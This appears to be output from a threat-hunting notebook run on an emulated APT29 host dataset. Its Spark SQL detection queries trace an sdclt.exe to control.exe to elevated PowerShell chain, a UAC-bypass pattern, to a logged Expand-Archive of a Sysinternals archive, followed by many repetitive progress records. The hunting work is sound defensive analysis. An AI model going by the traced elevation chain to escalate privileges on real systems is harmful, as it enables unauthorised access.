ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="267"
 
-RECORD 85----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 86----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="266"
 
-RECORD 87----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 88----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="265"
 
-RECORD 89----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 90----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="264"
 
-RECORD 91----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 92----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="263"
 
-RECORD 93----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 94----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="262"
 
-RECORD 95----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 96----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="261"
 
-RECORD 97----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 98----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="260"
 
-RECORD 99----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="84"
                                                                                                                                                                                                                                                                 
only showing top 100 rows

Query ID:09F29912-8E93-461E-9E89-3F06F6763383

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessId
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4104
    AND LOWER(f.ScriptBlockText) LIKE "%expand-archive%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Expand-Archive -LiteralPath "$env:USERPROFILE\Downloads\SysinternalsSuite.zip" -DestinationPath "$env:USERPROFILE\Downloads\"

ScriptBlock ID: 63fc6cf4-cd9f-4134-9231-51ccb5c7d247
Path:  

Query ID:B5F24262-9373-43A4-A83F-0DBB708BD2C0

df = spark.sql(
'''
SELECT Payload
FROM apt29Host f
INNER JOIN (
    SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
    FROM apt29Host d
    INNER JOIN(
      SELECT a.ProcessId, a.NewProcessId
      FROM apt29Host a
      INNER JOIN (
        SELECT NewProcessId
        FROM apt29Host
        WHERE LOWER(Channel) = "security"
            AND EventID = 4688
            AND LOWER(NewProcessName) LIKE "%control.exe"
            AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
      ) b
      ON a.ProcessId = b.NewProcessId
      WHERE LOWER(a.Channel) = "security"
        AND a.EventID = 4688
        AND a.MandatoryLabel = "S-1-16-12288"
        AND a.TokenElevationType = "%%1937"
    ) c
    ON d.ProcessId = c.NewProcessId
    WHERE LOWER(d.Channel) = "security"
      AND d.EventID = 4688
      AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4103
    AND LOWER(f.Payload) LIKE "%expand-archive%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Expand-Archive): "Expand-Archive"
ParameterBinding(Expand-Archive): name="LiteralPath"; value="C:\Users\pbeesly\Downloads\SysinternalsSuite.zip"
ParameterBinding(Expand-Archive): name="DestinationPath"; value="C:\Users\pbeesly\Downloads\"
ParameterBinding(Expand-Archive): name="Path"; value=""
ParameterBinding(Expand-Archive): name="Force"; value="False"
                                                                                                                                                                                                                                     
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Completed"; value="True"
                                                                                                                                                                                                                                                                                                                                                                                                                               
-RECORD 2-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="308"
 
-RECORD 3-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="100"
                                                                                                                                                                                                                                                                
-RECORD 4-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="307"
 
-RECORD 5-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="100"
                                                                                                                                                                                                                                                                
-RECORD 6-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="306"
 
-RECORD 7-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 8-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="305"
 
-RECORD 9-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 10----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="304"
 
-RECORD 11----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 12----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="303"
 
-RECORD 13----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 14----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="302"
 
-RECORD 15----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 16----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="301"
 
-RECORD 17----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 18----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="300"
 
-RECORD 19----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 20----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="299"
 
-RECORD 21----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 22----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="298"
 
-RECORD 23----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 24----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
